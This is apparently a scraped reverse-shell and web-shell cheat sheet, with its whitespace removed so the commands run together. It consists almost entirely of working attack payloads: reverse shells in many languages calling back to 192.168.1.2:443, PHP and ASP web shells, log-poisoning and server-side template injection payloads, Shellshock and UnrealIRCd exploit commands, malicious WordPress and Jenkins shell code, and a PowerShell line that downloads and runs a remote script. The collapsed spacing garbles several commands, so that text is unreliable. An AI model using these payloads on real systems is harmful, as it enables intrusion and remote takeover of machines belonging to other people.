Bash
BashURLEncodingNetcat
NetcatLinuxNetcatWindowsNetcatURLEncodingWebShell
ASPWebShellPHPWebShellLogPoisoningWebShellSSHFTPHTTPServerSideTemplateInjection(SSTI)
UnrealIRCd
Shellshock
SSHHTTPHTTP500InternalServerErrorCMS
WordPressOctoberJenkinsPerl
Python
Python3
PHP
Ruby
Xterm
Ncat
PowerShell
Awk
Gawk
Golang
Telnet
Java
Node
Msfvenom
WebPayloadsPHPWARJARJSPASPXLinuxPayloadsListenerNetcatListenerMetasploitMultiHandlerWindowsPayloadsListenerNetcatListenerMetasploitMultiHandlerBashbash-i>&/dev/tcp/192.168.1.2/4430>&1bash-c"bash-i>&/dev/tcp/192.168.1.2/4430>&1"0<&196;exec196<>/dev/tcp/192.168.1.2/443;sh<&196>&1962>&196bash-l>/dev/tcp/192.168.1.2/4430<&12>&1BashURLEncodingbash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.2%2F443%200%3E%261%22NetcatNetcatLinuxnc-e/bin/sh192.168.1.2443nc-e/bin/bash192.168.1.2443nc-c/bin/sh192.168.1.2443nc-c/bin/bash192.168.1.2443rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc192.168.1.2443>/tmp/fNetcatWindowsnc.exe-ecmd192.168.1.26443NetcatURLEncodingrm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.1.2%20443%20%3E%2Ftmp%2FfWebShellASPWebShell<%response.writeCreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>PHPWebShellBasic<?phpsystem($_GET['cmd']);?>BasicProportionsOK<?phpecho"<pre>".shell_exec($_REQUEST['cmd'])."</pre>";?>LogPoisoningWebShellLogPoisoningSSH/var/log/auth.log
ssh'<?phpsystem($_GET['cmd']);?>'@192.168.1.2/var/log/auth.log&cmd=id
LogPoisoningFTP/var/log/vsftpd.log
root@kali:~#ftp192.168.1.3Connectedto192.168.1.3.220(vsFTPd3.0.3)Name(192.168.1.2:kali):<?phpsystem($_GET['cmd']);?>331Pleasespecifythepassword.Password:<?phpsystem($_GET['cmd']);?>530Loginincorrect.Loginfailed.ftp>/var/log/vsftpd.log&cmd=id
LogPoisoningHTTP/var/log/apache2/access.log
/var/log/nginx/access.log
curl-s-H"User-Agent:<?phpsystem(\$_GET['cmd']);?>""https://192.168.1.2"User-Agent:<?phpsystem($_GET['cmd']);?>/var/log/apache2/access.log&cmd=id
/var/log/nginx/access.log&cmd=id
ServerSideTemplateInjection{%forxin().__class__.__base__.__subclasses__()%}{%if"warning"inx.__name__%}{{x()._module.__builtins__['__import__']('os').popen("python3-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'").read().zfill(417)}}{%endif%}{%endfor%}UnrealIRCdroot@kali:~#echo"AB;nc-e/bin/sh192.168.1.2443"|nc192.168.1.36667ShellshockShellshockSSHroot@kali:~#sshuser@192.168.1.3-iid_rsa'(){:;};nc192.168.1.2443-e/bin/bash'ShellshockHTTPcurl-H"User-Agent:(){:;};/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'""https://192.168.1.3/cgi-bin/evil.sh"curl-H"User-Agent:(){:;};/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'""https://192.168.1.3/cgi-bin/evil.cgi"ShellshockHTTP500InternalServerErrorcurl-H"User-Agent:(){:;};echo;/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'""https://192.168.1.3/cgi-bin/evil.sh"curl-H"User-Agent:(){:;};echo;echo;/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'""https://192.168.1.3/cgi-bin/evil.sh"curl-H"User-Agent:(){:;};echo;/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'""https://192.168.1.3/cgi-bin/evil.cgi"curl-H"User-Agent:(){:;};echo;echo;/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'""https://192.168.1.3/cgi-bin/evil.cgi"CMSWordPressPluginReverseShellroot@kali:~#nanoplugin.php<?php/***PluginName:Shelly*PluginURI:https://localhost*Description:LoveShelly*Version:1.0*Author:d4t4s3c*AuthorURI:https://github.com/d4t4s3c*/exec("/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'");?>root@kali:~#zipplugin.zipplugin.phpPlugins
AddNew
UploadPlugin
InstallNow
ActivatePlugin
Octoberfunctiononstart(){exec("/bin/bash-c'bash-i>&/dev/tcp/192.168.1.2/4430>&1'");}JenkinsStringhost="192.168.1.2";intport=443;Stringcmd="cmd.exe";Processp=newProcessBuilder(cmd).redirectErrorStream(true).start();Sockets=newSocket(host,port);InputStreampi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStreampo=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try{p.exitValue();break;}catch(Exceptione){}};p.destroy();s.close();Perlperl-e'useSocket;$i="192.168.1.2";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};'PythonexportRHOST="192.168.1.2";exportRPORT=443;python-c'importsys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd)forfdin(0,1,2)];pty.spawn("/bin/sh")'python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);importpty;pty.spawn("/bin/bash")'Python3python3-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);importpty;pty.spawn("/bin/bash")'PHP<?phppassthru("rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc192.168.1.2443>/tmp/f");?>php-r'$sock=fsockopen("192.168.1.2",443);`/bin/sh-i<&3>&32>&3`;'php-r'$sock=fsockopen("192.168.1.2",443);exec("/bin/sh-i<&3>&32>&3");'php-r'$sock=fsockopen("192.168.1.2",443);system("/bin/sh-i<&3>&32>&3");'php-r'$sock=fsockopen("192.168.1.2",443);passthru("/bin/sh-i<&3>&32>&3");'php-r'$sock=fsockopen("192.168.1.2",443);popen("/bin/sh-i<&3>&32>&3","r");'php-r'$sock=fsockopen("192.168.1.2",443);shell_exec("/bin/sh-i<&3>&32>&3");'php-r'$sock=fsockopen("192.168.1.2",443);$proc=proc_open("/bin/sh-i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'Rubyruby-rsocket-e'f=TCPSocket.open("192.168.1.2",443).to_i;execsprintf("/bin/sh-i<&%d>&%d2>&%d",f,f,f)'ruby-rsocket-e'exitiffork;c=TCPSocket.new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.printio.read}end'ruby-rsocket-e'c=TCPSocket.new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.printio.read}end'Xtermxterm-display192.168.1.2:443Ncatncat192.168.1.2443-e/bin/bashPowerShellpowershell-NoP-NonI-WHidden-ExecBypass-CommandNew-ObjectSystem.Net.Sockets.TCPClient("192.168.1.2",443);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne0){;$data=(New-Object-TypeNameSystem.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex$data2>&1|Out-String);$sendback2=$sendback+"PS"+(pwd).Path+">";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()powershell-nop-c"$client=New-ObjectSystem.Net.Sockets.TCPClient('192.168.1.2',443);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne0){;$data=(New-Object-TypeNameSystem.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex$data2>&1|Out-String);$sendback2=$sendback+'PS'+(pwd).Path+'>';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"powershellIEX(New-ObjectNet.WebClient).DownloadString('https://192.168.1.2:8000/reverse.ps1')Awkawk'BEGIN{s="/inet/tcp/0/192.168.1.2/443";while(42){do{printf"shell>"|&s;s|&getlinec;if(c){while((c|&getline)>0)print$0|&s;close(c);}}while(c!="exit")close(s);}}'/dev/nullGawkgawk'BEGIN{P=443;S=">";H="192.168.1.2";V="/inet/tcp/0/"H"/"P;while(1){do{printfS|&V;V|&getlinec;if(c){while((c|&getline)>0)print$0|&V;close(c)}}while(c!="exit")close(V)}}'Golangecho'packagemain;import"os/exec";import"net";funcmain(){c,_:=net.Dial("tcp","192.168.1.2:443");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=ccmd.Run()}'>/tmp/t.go&&gorun/tmp/t.go&&rm/tmp/t.goTelnetrm-f/tmp/p;mknod/tmp/pp&&telnet192.168.1.24430/tmp/ptelnet192.168.1.280|/bin/bash|telnet192.168.1.2443Javar=Runtime.getRuntime()p=r.exec(["/bin/bash","-c","exec5<>/dev/tcp/192.168.1.2/443;cat<&5|whilereadline;do\$line2>&5>&5;done"]asString[])p.waitFor()
评论